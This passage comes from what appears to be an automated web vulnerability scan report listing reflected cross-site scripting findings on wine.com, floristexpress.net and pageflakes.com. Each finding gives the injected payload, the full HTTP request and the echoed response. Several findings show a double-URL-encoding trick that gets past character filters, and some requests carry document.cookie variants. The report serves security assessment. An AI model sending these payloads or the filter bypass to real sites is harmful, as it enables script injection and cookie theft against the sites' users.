Confidence:   Certain
Host:   http://wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 95fbb<script>alert(1)</script>ebf48b3277d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/analytics/s_remote_code.js?Lo0P=95fbb<script>alert(1)</script>ebf48b3277d HTTP/1.1
Host: wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: SLRS
Date: Sun, 13 Feb 2011 13:56:49 GMT
Content-Type: text/html
Content-Length: 271

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /includes/analytics/s_remote_code.js?Lo0P=95fbb<script>alert(1)</script>ebf48b3277d was not found on this server.<P>
...[SNIP]...

2.69. http://www.floristexpress.net/ [refcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the refcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b295e"%3balert(1)//b7f69ae6950 was submitted in the refcode parameter. This input was echoed as b295e";alert(1)//b7f69ae6950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?refcode=ORDb295e"%3balert(1)//b7f69ae6950&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.163CKOWO; path=/
Date: Fri, 11 Feb 2011 18:54:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5bd434039a4b158c8c4c53fc2d56586; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a4f657633e93d2b0ff275b5f8026f4ac; path=/
Set-Cookie: ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950; path=/
Content-Type: text/html
Content-Length: 102831

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.70. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0ff4'-alert(1)-'4f888188b50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscribe.aspxf0ff4'-alert(1)-'4f888188b50 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 22:07:50 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=9BC76F1B6579893AAA7E3D57568305BB0615B8E03528C13E5204E8938370DDFD410D18D6172426FB4E18B2F14D6175990C93D210557DCCFAC6629B1D625451C44E23529EB1F44818C1E494EADE010B5F56458B6D4EF75C4537C38153ED7488C87F8F183984047899AA3E55A08175067496390B27D4A9BAF6E6D6A4EB49AC22F05DB48463CB196E9F47B7AEA8C37D85188B573B342B978A937243D50771E8E5AF; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspxf0ff4'-alert(1)-'4f888188b50&r=634330300708437500';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

2.71. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84bfb</script><script>alert(1)</script>3fa53c24637 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscribe.aspx?84bfb</script><script>alert(1)</script>3fa53c24637=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:51:08 GMT
Server: Microsoft-IIS/6.0
From: web10
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=DCB00C653606122DEA07BBF080277B1C330C2AD71BA0229AAC13AFE21B33BC0594461B5FC8CD76294B055551EB9082CBA90403BB44876B15A6A51CD7B034D3F44FB804F207869ECC178FB021FC8D7E1F627B71E8CBBD14F0F4F8779C0C382F1A9FEC896EA3EC477DFFF027765A4ED7B9653BAFA74C7F426485810AD9B65F0642B6CD275C3E76A232904AC330E6010AC4563DD63C3CB85D3684F3B35F8D7ECC87; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?84bfb</script><script>alert(1)</script>3fa53c24637=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

2.72. http://www.wine.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c475%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8d377b4800 was submitted in the REST URL parameter 1. This input was echoed as 2c475"><script>alert(1)</script>e8d377b4800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico2c475%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8d377b4800 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 13:56:42 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 13:56:42 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33525


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/favicon.ico2c475"><script>alert(1)</script>e8d377b4800" value="" />
...[SNIP]...

2.73. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0fedd55f396 was submitted in the REST URL parameter 1. This input was echoed as b38df"><script>alert(1)</script>0fedd55f396 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includesb38df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0fedd55f396/analytics/s_remote_code.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:39 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33439
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:38 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includesb38df"><script>alert(1)</script>0fedd55f396/analytics/s_remote_code.js" value="" />
...[SNIP]...

2.74. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7bcbf825c9 was submitted in the REST URL parameter 2. This input was echoed as b6a54"><script>alert(1)</script>e7bcbf825c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/analyticsb6a54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7bcbf825c9/s_remote_code.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:46 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:46 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33439


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/analyticsb6a54"><script>alert(1)</script>e7bcbf825c9/s_remote_code.js" value="" />
...[SNIP]...

2.75. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c47f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2003fe95c59 was submitted in the REST URL parameter 3. This input was echoed as c47f8"><script>alert(1)</script>2003fe95c59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/analytics/s_remote_code.jsc47f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2003fe95c59 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:56 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33439


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/analytics/s_remote_code.jsc47f8"><script>alert(1)</script>2003fe95c59" value="" />
...[SNIP]...

2.76. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/css/defaultsix.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19b1a745d3c was submitted in the REST URL parameter 1. This input was echoed as 190ab"><script>alert(1)</script>19b1a745d3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes190ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19b1a745d3c/css/defaultsix.css HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:37 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:36 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33431


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes190ab"><script>alert(1)</script>19b1a745d3c/css/defaultsix.css" value="" />
...[SNIP]...

2.77. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/css/defaultsix.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce42%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede459d037ed was submitted in the REST URL parameter 2. This input was echoed as 5ce42"><script>alert(1)</script>de459d037ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/css5ce42%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede459d037ed/defaultsix.css HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:47 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33431
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:46 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/css5ce42"><script>alert(1)</script>de459d037ed/defaultsix.css" value="" />
...[SNIP]...

2.78. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/css/defaultsix.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d73a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5dff43dcf33 was submitted in the REST URL parameter 3. This input was echoed as d73a5"><script>alert(1)</script>5dff43dcf33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/css/defaultsix.cssd73a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5dff43dcf33 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:56 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33431


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/css/defaultsix.cssd73a5"><script>alert(1)</script>5dff43dcf33" value="" />
...[SNIP]...

2.79. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/stateSelect.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef2fe37d33b was submitted in the REST URL parameter 1. This input was echoed as 87245"><script>alert(1)</script>ef2fe37d33b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes87245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef2fe37d33b/js/stateSelect.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:37 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:36 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33430


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes87245"><script>alert(1)</script>ef2fe37d33b/js/stateSelect.js" value="" />
...[SNIP]...

2.80. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/stateSelect.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef58af180709 was submitted in the REST URL parameter 2. This input was echoed as 9a2e2"><script>alert(1)</script>f58af180709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/js9a2e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef58af180709/stateSelect.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
